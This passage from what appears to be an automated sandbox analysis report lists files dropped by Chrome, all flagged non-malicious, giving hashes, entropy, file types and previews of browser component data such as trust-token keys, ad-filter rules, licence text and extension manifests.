                                                                                                                                                                                                                                                            SHA-512:BDEC3E243A6F39BFEA4130C85B162EA00A4974C6057CD06A05348AC54517201BBF595FCC7C22A4AB2C16212C6009F58DF7445C40C82722AB4FA1C8D49D39755C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"https://issuer.captchafox.com":{"PrivateStateTokenV1VOPRF":{"batchsize":1,"id":1,"keys":{"0":{"Y":"AAAAAQQiyE+SESbq7GU5rTx6tZO4tBOxljp+Oya2mU28O+YoALIyXlLLqnl/h5h95ExYSsOlmMIb8EdsJBTrCaDl/KIZSskrfMbZpjhShG0jwnbXojEHI9WaAxKLkX/A/DkyMEg=","expiry":"1734807628115000"},"1":{"Y":"AAAAAQRNtld+5LLBquS4bEJKJwlLw61tzIyqTNkvMVnUTu+YiphbdGrRCjeDTN9D3p1Tgpfmq0N/OKMBYWzDMEN8Km9p9s49c6N2ph4B1MV1m7Ogdj969MOsTw54Kc849oqDl8s=","expiry":"1734807628115000"},"2":{"Y":"AAAAAQSBWW003A3ORFURCZrWNnbEIH15yzk184DaLSebbGzRdyCYtAM1qhhVmXZyBtWTzh6Bfkk5rLPyE1xdQilofPBizF/QJsdaMU0GYhPW1sOU4xoKbmgd/XrnOoFqA2ETOuc=","expiry":"1734807628115000"},"3":{"Y":"AAAAAQSG/ftGdm5B6iwAmVsHt6s43xx3nRf/Vpx9GdeEt3jSTM8hHvyLE9FAEkinGjt4Fp5EjnkCdE96Cxz10nZJRrMApIrGhG5kAoDu4T8PjJPiFQFyHAOdTG7OJWi2NS/rl1A=","expiry":"1734807628115000"},"4":{"Y":"AAAAAQT36tqe550UP5A+4Eokt8iuPZEuWQc9cGJXd7zUCZzrsqtGu3PMcVbOj5DjC4W+yoyF3HqKOqdtiBWgcMsZOcyln/6jUKqf5tS9AoIHa9CC3kQB8ISQd3lhR5j+qWVY8ms=","expiry":"1734807628115000"},"5":{"Y":"AAAAAQQMjaLNCR
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):4.005340674128682
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SUsO4D2HGQ42IAVFxx9WQnRJn:SUsO4qmQHVDx0QDn
                                                                                                                                                                                                                                                            MD5:030D9E3F4502E24594ABCA380C073974
                                                                                                                                                                                                                                                            SHA1:AE068D4F8C668477DD8F4BC2892F09D0802130E0
                                                                                                                                                                                                                                                            SHA-256:FD86A9E808BCC78B926C111633615D9A807D60A20CE2BAC7360915336ABB738F
                                                                                                                                                                                                                                                            SHA-512:F28A0311A80FE81965874AE5A46161A7658E149AA48E26B81C500339461B84F2EB53193AEF4E4C78AADB7191AC4518E81BBFB1672CE6077200CC6DF5FAC4054B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.1987650928271ad440c2b8a50f309139de82c742fb6f1f3ea055b35718ac46e7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):79
                                                                                                                                                                                                                                                            Entropy (8bit):4.442932812379182
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFIPgS1oSLsY:F6VlMyPgS1oxY
                                                                                                                                                                                                                                                            MD5:7F4B594A35D631AF0E37FEA02DF71E72
                                                                                                                                                                                                                                                            SHA1:F7BC71621EA0C176CA1AB0A3C9FE52DBCA116F57
                                                                                                                                                                                                                                                            SHA-256:530882D7F535AE57A4906CA735B119C9E36480CBB780C7E8AD37C9C8FDF3D9B1
                                                                                                                                                                                                                                                            SHA-512:BF3F92F5023F0FBAD88526D919252A98DB6D167E9CA3E15B94F7D71DED38A2CFB0409F57EF24708284DDD965BDA2D3207CD99C008B1C9C8C93705FD66AC86360
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "trustToken",. "version": "2025.1.17.1".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):75385
                                                                                                                                                                                                                                                            Entropy (8bit):5.5362778400961234
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:mA9s0XZjhGQQlppnSLk3riDXgg60rvQY0sMIUvECt/SvOz2S6rVz:75JjAQyppsk3rIXgg60zQY0sMIJCt/TK
                                                                                                                                                                                                                                                            MD5:7C91E14B081C346267E1B1761C029F1C
                                                                                                                                                                                                                                                            SHA1:40D2665FD0042A5AAA3B8C7C451813D6C7005EAD
                                                                                                                                                                                                                                                            SHA-256:FD3ADE759BD847F845FE201167DE1F53E53A2275631303952F1AC4D7AB5B19DC
                                                                                                                                                                                                                                                            SHA-512:89A269667034FC15E7ECDC3AEC70375949C1AE65A944CB3D762909152C8DB1C4B163AA2162698A0345889154E248B5A70B7C93182F5A853529EEFD889926233D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.just-news.pro^..........0.8.@.R.yomeno.xyz^..........0.8.@.R.yellowblue.io^..........0.8.@.R.abh.jp^..........0.8.@.R.ad999.biz^..........0.8.@.R._468_60...........0.8.@.R.adrecover.com^..........0.8.@.R.pemsrv.com^..........0.8.@.R.mnaspm.com^.$........0.8.@.R.tags.refinery89.com^.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_.>........*...worldstar.com0.8.@.R.js.assemblyexchange.com/wana..(........0.8.@.R.ogads-pa.googleapis.com^..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^.(........0.8.@.R.shikoku-np.co.jp/img/ad/..........0.8.@.R./banner.cgi?..........0.8.@.R./in/track?data=.!......0.8.@.R.linkbucks.com/tmpl/..........0.8.@.R.clicktripz.com^..........0.8.@.R.-ad-manager/........0.8.@.R.files.slack.com^.$........0.8.@.R.admitad-connect.com^..........0.8.@.R./300-250-.2........0.8.@.R"cloudfront.net/js/common
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):24623
                                                                                                                                                                                                                                                            Entropy (8bit):4.588307081140814
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                                                                                                                                                                            MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                                                                                                                                                                            SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                                                                                                                                                                            SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                                                                                                                                                                            SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1529
                                                                                                                                                                                                                                                            Entropy (8bit):5.982051252370357
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:pZRj/flTHYPybkYbKLgTxjeT3JzkaoXlbEQY8icDGOaoXbnT3E/XbWk+U6kjO8n:p/h4PybKzThkaklI8VD4kbnTSXbWk+U9
                                                                                                                                                                                                                                                            MD5:329A2437D4B1EC17C8E6DCD217559B89
                                                                                                                                                                                                                                                            SHA1:716B26423B811D32AFA4726DD7D9A1640108CFF5
                                                                                                                                                                                                                                                            SHA-256:9CF8010C8CFA447F0F9380FB38D114F0A86640127EA24082C597A61C4E99F2D0
                                                                                                                                                                                                                                                            SHA-512:BE6C23EADC6F4D1DFAFB7170FC63C1682673DD5C80FA8AC1671F7C4F267EAD52C39B5B7B4A406811FE60D98FE7C244A10EBC5E834026A8D1C3FEDD4A57F8814D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJfaG1nMmc3R0ZSa2ZEVVFvQWRoQjkwRVM1NTkxODhKUlBCWHpHT0VkX1J3In0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IllBQ3ZvYkFpQXUxSUljSkx2ZGlNNmxPY0xMVFE3M0F6dlYwLWEwM2U1REEifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuNTQuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"k8_0_49JMWcS1Qkgr00kJA2EtwGYwZUlWjpXCKGeZYRWFXFSbaU6OhtXlrTAbdt5z6VxDX6EbEIrebxVNW9OhlfIwrnewGdmf0VfnrWbAk3W34JdlDFj7qsVMw0W4n-AnXQgbMNnPDenRtQ7CaZ1ykFy-AskQ6UiPOohoXmMSqtcvoopecSrYgN_uEHIqDHpHQRZ5k-O3UMnA4WqeQNzYnI0UQwc4O-3EstHxQ_3Qe7CtkFv5
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.7646746586784845
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SRlkYcchAWGUSIZ/DpDDUln1n:SgxcWWGU3BDpDIp1n
                                                                                                                                                                                                                                                            MD5:15EE3110CFFD7766F9ACBF66787F7640
                                                                                                                                                                                                                                                            SHA1:5F9FF88E60668696D735A4BB763EF778A3D0A954
                                                                                                                                                                                                                                                            SHA-256:88F8B99B98B0586E9ACFCB563D7D1B65CBA3E851AAF76D83FA095EC991884608
                                                                                                                                                                                                                                                            SHA-512:C71967C0015F60E7C0FBA96E5914C2C4981D91851F8492C6CFDEE67778DB81846242CFE55EB1246B50635BA2C363BFED4BB78139A624E85479AEF2F68D5C1226
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.4927ba841546599b3eaa6e1643a5fd15babbb30be00f0f419a7f148a40a71a12
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                                                                            Entropy (8bit):4.56489413033116
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1htA:F6VlMZWuMt5SKPS1s
                                                                                                                                                                                                                                                            MD5:01C878F43569459B9671819276FC381A
                                                                                                                                                                                                                                                            SHA1:C04140758F7FD681CC55ACF2B02D988F13AEF25C
                                                                                                                                                                                                                                                            SHA-256:6000AFA1B02202ED4821C24BBDD88CEA539C2CB4D0EF7033BD5D3E6B4DDEE430
                                                                                                                                                                                                                                                            SHA-512:F80B39516CEDD3108676E4C41C19FB7A6D05F2A92FFCBB4EA595F111DFD5E4D14DC7DE5C3C871E0FE5D90D40C6C45A8C646C324329AD7AA8FD37C1D4D0810E8F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.54.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1796
                                                                                                                                                                                                                                                            Entropy (8bit):6.013516832672966
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/h0I1PmpFNMRk7ak3n+eEvLyqlcQxH5KkUqnQ0NGW6:RHPm+e7a0+eEvLBlnZK9AQ0NG9
                                                                                                                                                                                                                                                            MD5:EB44AFFA442E881680A5E001492BF854
                                                                                                                                                                                                                                                            SHA1:25E7695F09F294946288758A201B7ED3128B9F09
                                                                                                                                                                                                                                                            SHA-256:A84A32BFEDE1FCD03425C7108D31F71E384B744D6AAD5A34ED7E0992176990BB
                                                                                                                                                                                                                                                            SHA-512:DA196A7EC93C9302FFD62014BEE3BA0559515A5042EC47F812DF1114914D7556EF821487455F6386E13D8B948F3EDB92B209ACF72B3F8FA1FB6E12C0E9B19C96
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJjcl9lbi11c181MDAwMDBfaW5kZXguYmluIiwicm9vdF9oYXNoIjoiNlpDRnJzSXoxSGxUVHM4NTFCUXMyejVma0o2cFVHdk9vbXlpMXk1TmhjYyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJwdUg0Y05Ld2pLZW9XV1pfbWh2ZXFTeGo3YmNKN1VrOGtMczdNcDQ0cEkwIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoib2JlZGJiaGJwbW9qbmthbmljaW9nZ25tZWxtb29tb2MiLCJpdGVtX3ZlcnNpb24iOiIyMDI1MDExNC43MjAzNTIyNzEuMTQiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"J54-pntmLwSGnKO4zrk8jlgJ51AMnh3gUrYlFdI0EbqeWgUvN4-PdPUy4YlSo7ZJdllOLJ9JSfu9Ekf2DZfhNZOsqOBZQR2YY3t4kpNcF6eBkMn9IMqcmapVyJc1q3EIrOw4ECjRSjS0g7BB0CWWclh7FAZq2aLeHeuQemj7Yfb33OXhawuIsiz68n8y0bY_s2Eh9FzOeKDOyJdHAU43GJYjYzK3F8_Nt6UiysX7JsrHZYxiURSh9pXAgkhE5AJAvnI1frL49Rq3Qi-9tu9vVKw4czp9rmjZxNYBwHztmv3qDt_LRqzkCjcmpoD
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7978194
                                                                                                                                                                                                                                                            Entropy (8bit):6.56942491674059
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:36VVf/lKb7TP20QiGOmYpaGD+VYviZzm/MQaEteqnvtK:Mf/t1H4tQoetQVdvtK
                                                                                                                                                                                                                                                            MD5:32F641A7EF737CF23936A032D1D7E371
                                                                                                                                                                                                                                                            SHA1:F483672A90DA0598345D892482C805AB773D620C
                                                                                                                                                                                                                                                            SHA-256:151E1CD4E7CD605D9F96FA2E60A6D9CE31C3A42E28E308AB1EC4434A7A6824CA
                                                                                                                                                                                                                                                            SHA-512:D7C9FD7183DD19D5A56B3625ED07500578AD939867F33C9D3596D494C02BCE9F9C4DF340595FB2327CD7E5BCF0E78B0438F91D5E4D1319107C6012FA45E1F348
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:......w.....a.....t.. ..h.g/..f.S@..y..H..gm.I..cm.Q..r7'g..n..o..l..v..e_....bC...d.....u.....mS....o1...p.6...s.....i9....z.....v.....k.....ja{...xa,...17....5.....4G....q.....2.7...9.....7.%...3.i...6}....8o......J...0.R...*671\.....\....[]........`...&.a....]b.....b.....e....... ef.....f.....h....... ;i.....i...$.k.../;t.........`.....u....rsula corber......}u.... to usdt..... meaning...+.lafur darri .lafsson movies and tv shows4...-.u....!v.....av.............. .... ........v.....v...(.v..... meaning.....1w.....w..... meaningz:....r eldon."..).x..... meaning....@Ex...#}x....sad.ra bjarkard.ttir barney....... .x...... ..... ..6`........ . ......].... meaning.S......R...... ............ meaning.....eviri.X. . .... ..........4..... meaning...... meaning.....5y..... meaning.p.... meaning.?.... .. .. ..<<.... meaning<<....... 2024P0
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.8559751366930737
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SdYWX2RSDWU9zTQgVRE8cUDjuAHc:SGbRwT9dgUDjU
                                                                                                                                                                                                                                                            MD5:85E3F88F5559E5EC173AD09F5039B77E
                                                                                                                                                                                                                                                            SHA1:53741A0E44F2A6FC75265EAC8D135047715771CD
                                                                                                                                                                                                                                                            SHA-256:3EDBC320D6E82C9C4187B5A2C187C72B31A1C6724357E7ADA3E9A6B5FDD2D4F6
                                                                                                                                                                                                                                                            SHA-512:C4E49C7BA3B4D982DF741FD7FEC1E6E9475A74DD103261647A26FB999F8B9901D1C6C2509F53D1F3599380AFFB4776A0D320AAED64CD65ED87693685B58DEBFD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.81d390647809b47f3150cd7e7d320669ccc048c6b01b0c1e1506c51740aabeb9
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):108
                                                                                                                                                                                                                                                            Entropy (8bit):4.830002581336876
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifF0AAGAR3CKG/w/VpKS12XkBrx:F6VlMT2C7Y/VUS12q
                                                                                                                                                                                                                                                            MD5:A60AEB7351A04597B542BA569CFDD0FD
                                                                                                                                                                                                                                                            SHA1:B5D931942C30E5F11F80AE850ABD25B4A63340D6
                                                                                                                                                                                                                                                            SHA-256:A6E1F870D2B08CA7A859667F9A1BDEA92C63EDB709ED493C90BB3B329E38A48D
                                                                                                                                                                                                                                                            SHA-512:C1EE9433D347918F4ECA9BFD98CA69456F7524F55D01A39A0BC887F84C61C3F408F99BA76999860BD26DE8DDE5443E8820F02C789D682923D2005A1CC00DE3A8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "OnDeviceHeadSuggestENUS500000",. "version": "20250114.720352271.14".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1558
                                                                                                                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                                                            Entropy (8bit):6.018989605004616
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                                                                                                                                                                                            MD5:C4709C1D483C9233A3A66A7E157624EA
                                                                                                                                                                                                                                                            SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
                                                                                                                                                                                                                                                            SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
                                                                                                                                                                                                                                                            SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.820000180714897
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
                                                                                                                                                                                                                                                            MD5:BBEC7670A2519FEB0627F17D0C0B5276
                                                                                                                                                                                                                                                            SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
                                                                                                                                                                                                                                                            SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
                                                                                                                                                                                                                                                            SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                                                                            Entropy (8bit):4.462192586591686
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
                                                                                                                                                                                                                                                            MD5:084E339C0C9FE898102815EAC9A7CDEA
                                                                                                                                                                                                                                                            SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
                                                                                                                                                                                                                                                            SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
                                                                                                                                                                                                                                                            SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9817
                                                                                                                                                                                                                                                            Entropy (8bit):4.629347296880043
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
                                                                                                                                                                                                                                                            MD5:8C702C686B703020BC0290BAFC90D7A0
                                                                                                                                                                                                                                                            SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
                                                                                                                                                                                                                                                            SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
                                                                                                                                                                                                                                                            SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
                                                                                                                                                                                                                                                            Malicious:false
